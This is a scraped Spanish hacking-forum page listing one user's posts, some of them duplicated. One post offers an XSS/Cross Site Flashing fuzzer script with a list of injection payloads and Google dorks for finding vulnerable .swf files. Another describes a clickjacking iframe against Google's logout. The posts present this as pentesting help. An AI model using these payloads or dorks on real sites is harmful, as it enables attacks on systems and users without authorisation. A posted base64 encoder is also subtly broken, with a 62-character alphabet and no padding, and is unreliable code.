La segunda forma es mejor te dice claramente: "You're vulnerable"
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#21
Noticias Informáticas / Re:Un bug en Bash vulnera la seguridad de sistemas Linux, Unix y OS X
Septiembre 25, 2014, 11:43:14 PM #22
Python / Base64 encode
Septiembre 13, 2014, 11:25:15 AM
Bueno, hace tiempo no compartía algo aquí pero pienso que compartir este código los puede ayudar. Todos hemos usado alguna vez base64 encode pero ¿qué hay detrás de la función?...
Código: python
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos,
Dedalo.
#!/usr/bin/python
def base64encode(encode):
s = encode
keys = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
out = ""
nums = 0
i = 0
while (i<len(s)):
if nums == 6:
out += keys[ord(s[i - 1]) & 63]
out += keys[ord(s[i]) >> 2]
nums = 2
else:
chr1 = ord(s[i - 1]) & (2 ** nums - 1)
chr2 = ord(s[i]) >> (nums + 2)
chrt = (chr1 << (6 - nums)) | chr2
out += keys[chrt]
nums += 2
i = i + 1
if nums != 0:
out += keys[(ord(s[len(s) - 1]) & (2 ** nums - 1)) << (6 - nums)]
return out
print base64encode("Base64 This")You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos,
Dedalo.
#23
Pentesting / Re:[Tutorial] XSS a ciegas
Septiembre 08, 2014, 01:26:08 PM
Muy bueno arthusu... es un ataque muy ruidoso pero midiendo bien y con el script correcto puede ser muy efectivo 
Saludos!
Saludos!
#24
Hacking ShowOff / Re:XSRF + Cross Site Framing en Google
Agosto 23, 2013, 04:43:56 PM
No hubo recompensa porque es XSRF de log-out no es dominio de sanbox... googleusercontent es el de sandbox
Saludos,
Dedalo.
Saludos,
Dedalo.
#25
Hacking ShowOff / Re:XSRF + Cross Site Framing en Google
Agosto 19, 2013, 08:42:33 PM
No, para ellos no califica, a mi me parece que debieron aun que sea haberme dado mención honorable pero si para ellos no es, ya yo no puedo hacer nada igual el equipo de google contestó de manera rápida y me divertí.
#26
Hacking ShowOff / XSRF + Cross Site Framing en Google
Agosto 19, 2013, 08:38:11 PM
He estado en estos días con un poco de tiempo libre así que me puse a buscar vulnerabilidades en google solo por diversión ya que es un target dificil, curiosamente encontré una vulnerabilidad, un link que si le mandas, lo deslogueas de su cuenta, se que muchos dirán click derecho al boton de desloguear copiar enlace y mandar eso, pero no, yo encontré una vulnerabilidad, una url de deslogueo es iframeable por lo que es vulnerable a ClickJacking y todos los ataques basados en FRAME por eso lo generalizo con Cross Site Framing... Sin mas que decir... un videito de la vuln.
Espero les guste, no hubo ni recompensa ni HoF pero me divertí mucho y eso cuenta...
Exploit:
<iframe src="You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" ></iframe>
Además una redirección:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos,
Dedalo.
Espero les guste, no hubo ni recompensa ni HoF pero me divertí mucho y eso cuenta...
Exploit:
<iframe src="You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" ></iframe>
Además una redirección:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos,
Dedalo.
#27
Pentesting / XSFF ~ Cross Site Flashing Fuzzer
Agosto 18, 2013, 06:54:37 PM
Les vengo a presentar esta t00lsita que hice en python, es un pequeño fuzzer de vectores de ataque de Cross Site Flashing... Debido al Cross Site Flashing entré al HoF de Apple y al de Microsoft por segunda vez en fin una pequeña intro...
A los .swf como a los php se les puede mandar variables al estilo get:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
muchas veces cuando ponen un .swf en una página web le envian estas variables para asignarle urls o colores o cosas asi... un pequeño ejemplo de la web de owasp:
Código: text
Ahora yo les voy a mostrar otro ejemplo el básico de JWplayer...
Código: text
Como ven dice file: myvideo skin: bekle ponerlo en el código fuente de esa manera es igual que ir a:
jwplayer.swf?file=myVideo.mp4&skin=bekle
entonces como funciona la cosa bien fácil existen códigos vulnerables en los .swf también que permiten ejecución de codigo Script en ellos... pero obviamente la pregunta es:
¿Como veo el código fuente?
Hay herramientas que lo desencriptan pero justamente por eso he hecho el pequeño fuzzer la mayoría de Cross Site Flahing ocurren de la misma manera con las mismas variables o alguien ya encontró la vulnerabilidad y ya hay un exploit predeterminado... asi que les dejo el fuzzer para que lo usen ustedes
Como es para usar el fuzzer bien fácil:
primero descárguenlo El código:
Código: text
Segundo no necesitan tener nada instalado mas que python... ahora...
En su command van a la carpeta donde está el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y ponen
python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login option
¿Cómo encontrar los vulnerable.swf? suelo hacer esta búsqueda:
site:test.com filetype:swf --> en Google.
site:test.com inurl:player.swf --> en Google.
site:test.com inurl:swfupload.swf --> en Google.
luego pues el .swf digamos encontramos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
vamos a nuestra consola y le damos:
python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login flashsite y luego pegar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bueno un PoC que encontré buscando con el Cross Site Flashing Fuzzer:
Sobre todo muchas veces los pentesters no prueban Cross Site Flashing en sus clientes, con el fuzzer los ayudo para que aunque sea descarten esta vulnerabilidad como una posibilidad.
Link de Interés:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
La demo es con una versión anterior del script ahora he mejorado la herramienta o bueno le he aumentado una pequeña opción pones dorksite y automáticamente busca dorks de .swf para ver si encuentran alguno por google.
Post Original: Click You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos,
Dedalo!
A los .swf como a los php se les puede mandar variables al estilo get:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
muchas veces cuando ponen un .swf en una página web le envian estas variables para asignarle urls o colores o cosas asi... un pequeño ejemplo de la web de owasp:
<object width="550" height="400" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,124,0">
<param name="movie" value="somefilename.swf">
<param name="FlashVars" value="var1=val1&var2=val2">
<embed src="somefilename.swf" width="550" height="400" FlashVars="var1=val1&var2=val2">
</embed>
</object>Ahora yo les voy a mostrar otro ejemplo el básico de JWplayer...
jwplayer("myElement").setup({
file: "myVideo.mp4",
skin: "bekle"
});Como ven dice file: myvideo skin: bekle ponerlo en el código fuente de esa manera es igual que ir a:
jwplayer.swf?file=myVideo.mp4&skin=bekle
entonces como funciona la cosa bien fácil existen códigos vulnerables en los .swf también que permiten ejecución de codigo Script en ellos... pero obviamente la pregunta es:
¿Como veo el código fuente?
Hay herramientas que lo desencriptan pero justamente por eso he hecho el pequeño fuzzer la mayoría de Cross Site Flahing ocurren de la misma manera con las mismas variables o alguien ya encontró la vulnerabilidad y ya hay un exploit predeterminado... asi que les dejo el fuzzer para que lo usen ustedes
Como es para usar el fuzzer bien fácil:
primero descárguenlo El código:
#!usr/bin/python
import sys
import webbrowser
END = "\033[0m"
blue = "\033[0;34m"
red = "\033[1;91m"
payloads = ['#javascript:alert(/XSFF/)','#http://seguridadblanca.in','#getURL(javascript:alert(/XSFF/))','#getURL(http://seguridadblanca.in)','#getURL,javascript:alert(/XSFF/)','#getURL,http://seguridadblanca.in','?javascript:alert(/XSFF/)','?http://seguridadblanca.in','?getURL(javascript:alert(/XSFF/))','?getURL(http://seguridadblanca.in)','?getURL,javascript:alert(/XSFF/)','?getURL,http://seguridadblanca.in','?clickTAG=javascript:alert(/XSFF/)','?clickTag=javascript:alert(/XSFF/)','?clickTag=http://seguridadblanca.in','?clickTAG=http://seguridadblanca.in','?url=javascript:alert(/XSFF/)','?url=http://seguridadblanca.in','?uri=javascript:alert(/XSFF/)','?uri=http://seguridadblanca.in','?URL=javascript:alert(/XSFF/)','?URL=http://seguridadblanca.in','?URI=javascript:alert(/XSFF/)','?URI=http://seguridadblanca.in','?baseurl=asfunction:getURL,javascript:alert(1337)//",','?base=javascript:alert(/XSFF/)','?base=http://seguridadblanca.in','?debug=alert(/XSFF/)','?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(/XSFF/);//','?skinName=asfunction:getURL,javascript:alert(1337)//','?onend=javascript:alert(1337)//','?imageURL=javascript:alert(/XSFF/)','?imageURL=" onerror=prompt(/XSFF/)','?callback=javascript:alert(/XSFF/)','?callback=http://seguridadblanca.in','?page=javascript:alert(/XSFF/)','?page=http://seguridadblanca.in','?buyNowUrl=javacript:alert(/XSFF/)','?id=0\%22))}catch(e){alert(1337)}//']
def helpyeah():
print "__ __ __ ___ ___"
print "\ V // _|| __|| __|"
print " ) ( \_ \| _| | _| "
print "/_n_\|__/|_| |_| \n"
print red + "Hi bro/sis :) Usage is: " + sys.argv[0] + " Option \n \n"
print "Print Options:\n"
print "dorksite - This Option will search for .swf files in the domain"
print "flashsite - Will Fuzz for XSF" + END
def checkoption():
if sys.argv[1].lower() == "dorksite":
dorksite()
elif sys.argv[1].lower() == "flashsite":
xsfyeah()
else:
helpyeah()
def xsfyeah():
uri = raw_input("Input the URL: Ex. http://seguridadblanca.in/vuln.swf\n")
fout = open("xsff.html", "w")
fout.write("<center><h1>Cros Site Flashing Fuzzer</h1> By <a href=\"http://twitter.com/seguridadblanca\">Dedalo</a></center><br />")
for url in payloads:
op = "<a href=\"" + uri + url +"\">" + url + "</a><br />"
fout.write(op)
print blue + "Check xsff.html for clicking fuzz!!"
print "Thanks for using XSFF"
print ""
print "__ __ __ ___ ___"
print "\ V // _|| __|| __|"
print " ) ( \_ \| _| | _| "
print "/_n_\|__/|_| |_| " + END
def dorksite():
domain = raw_input("Input the domain: Ex. seguridadblanca.in\n")
d1 = "site:" + domain + " filetype:swf"
d2 = "site:" + domain + " inurl:player.swf"
webbrowser.open_new_tab('https://www.google.com.pe/search?q=' + d1)
webbrowser.open_new_tab('https://www.google.com.pe/search?q=' + d2)
if len(sys.argv) < 2:
helpyeah()
else:
checkoption()Segundo no necesitan tener nada instalado mas que python... ahora...
En su command van a la carpeta donde está el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y ponen
python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login option
¿Cómo encontrar los vulnerable.swf? suelo hacer esta búsqueda:
site:test.com filetype:swf --> en Google.
site:test.com inurl:player.swf --> en Google.
site:test.com inurl:swfupload.swf --> en Google.
luego pues el .swf digamos encontramos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
vamos a nuestra consola y le damos:
python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login flashsite y luego pegar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Bueno un PoC que encontré buscando con el Cross Site Flashing Fuzzer:
Sobre todo muchas veces los pentesters no prueban Cross Site Flashing en sus clientes, con el fuzzer los ayudo para que aunque sea descarten esta vulnerabilidad como una posibilidad.
Link de Interés:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
La demo es con una versión anterior del script ahora he mejorado la herramienta o bueno le he aumentado una pequeña opción pones dorksite y automáticamente busca dorks de .swf para ver si encuentran alguno por google.
Post Original: Click You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos,
Dedalo!
#28
Pentesting / Re:NLAS Script
Enero 22, 2013, 10:45:33 AM
Gracias por eso arthusu Es una tool para tratar de ayudar a los pentesters...
Saludos,
Dedalo
Es una tool para tratar de ayudar a los pentesters...Saludos,
Dedalo
#29
Bugs y Exploits / Re:XSSF
Enero 20, 2013, 06:41:36 PM
Buena no conocía este modulo pero... es mejor que beef? me funciona bastantre bien beef...
Saludos,
Dedalo
Saludos,
Dedalo
#30
Off Topic / Re:Duda underc0de
Enero 15, 2013, 12:21:25 AM
a chevere mmm pero podrías subirlo en otro dominio de manera que todos podemos buscarle vulns si no encontramos nada implementarlo para hacer la comunidad mas dinámica
Saludos,
Dedalo
Saludos,
Dedalo
#31
Off Topic / Duda underc0de
Enero 15, 2013, 12:05:20 AM
hay algun tipo de plugin de comunidades o grupos algo asi para smf o que cada usuario tenga un muro tipo facebook como en vbulletin?
Saludos,
Dedalo
Saludos,
Dedalo
#32
Bugs y Exploits / Re:Backdorizando un archivo PHP
Enero 14, 2013, 11:55:14 PM
podrías acortar el code usando document.location con javascript y un .php externo.... así lo haría yo...
Saludos,
Dedalo
Saludos,
Dedalo
#33
Wargames y retos / Re:[Medium/Hard]MySQL Injection Challenge.
Enero 13, 2013, 04:36:34 PM #34
Bugs y Exploits / Re:ClickJacking a Ciegas - Mas allá de un Alert
Enero 13, 2013, 04:00:21 PM
si es mas facil les estoy presentando esta opción nada mas...
Saludos,
Dedalo
Saludos,
Dedalo
#35
Wargames y retos / Re:[Medium/Hard]MySQL Injection Challenge.
Enero 13, 2013, 02:13:11 PM
muy bueno... muy muy bueno!
#36
Underc0de / Re:SQLi Scanner Online [Underc0de]
Enero 13, 2013, 11:24:33 AM
Yo hice una t00l bien parecida a esta que buscaba con google buen trabajo sirven bastante!
Saludos,
Dedalo
Saludos,
Dedalo
#37
Underc0de / Re:Sugiere ideas para Underc0de!
Enero 13, 2013, 11:22:29 AM
Yo digo un concurso de Desarrollo con un buen premio. Diría de hacking pero al verdadero se le ve en programación no existen tools que programen por ti aun xD
Saludos,
Dedalo
Saludos,
Dedalo
#38
Underc0de / Re:Cpanel Finder Online [Underc0de]
Enero 13, 2013, 11:21:08 AM
Interesante aporte... turka habías estado por aquí xD
Saludos,
Dedalo
Saludos,
Dedalo
#39
Back-end / Re:[Sencillo ejemplo] Paginar resultados con PHP y MySQL
Enero 13, 2013, 11:13:27 AM
Buen code bro útil aunque ese ejemplo es Vulnerable...
Saludos,
Dedalo
Saludos,
Dedalo
#40
Off Topic / Re:De que pais eres?
Enero 13, 2013, 11:08:39 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola yo soy de Peru! ....
Donde tenemos , mas ricas comidas!! :3
aqui el cevichongo :3
y muchas mas! xD
en donde podemos encontrar comida al paso un buen menu desde 1.50 s/ en la tía veneno !
y que decir del las dichosas grandes empresas como "KFC"
aquí la gran mayoría prefiere ala tía muerte lenta xD donde venden las hamburguesas mas ricas y mas saludable y ah muy bajo precio .
estas descargando series de interned ? uu' Películas en estreno ? Música que todabia no encuentras en ningún lado ?
te aburres de buscar en interned ? y te cuesta sus 10 $ comprar uno original ?
aquí en el HUECO! hay todo clase de Películas-Música- y mucho mas..
ah , 1,50 s/ y asta en 3D nada que "MEDIA markt"
y que decir cuando se malogra tu pc , reparación, técnicos juegos , hackers, etc etc .... en "Wilson"
ahora quieres celulares de cualquier marca ? verdaderos especialistas ? entonces vente alas MALVINAS :3
en fin hay muchas cosas mas como ropa etc etc
hablemos de las chicas uff como las quieres ? tenemos de todas las razas ^^'
uffff!!
Como en todos los países odiamos a los congresistas
y lo bueno del peruano al menos dela mayoría es que es trabajador ,dejo una imagen para que mediten en ella .
.JPG)
AMEN!
~ Peruano ~
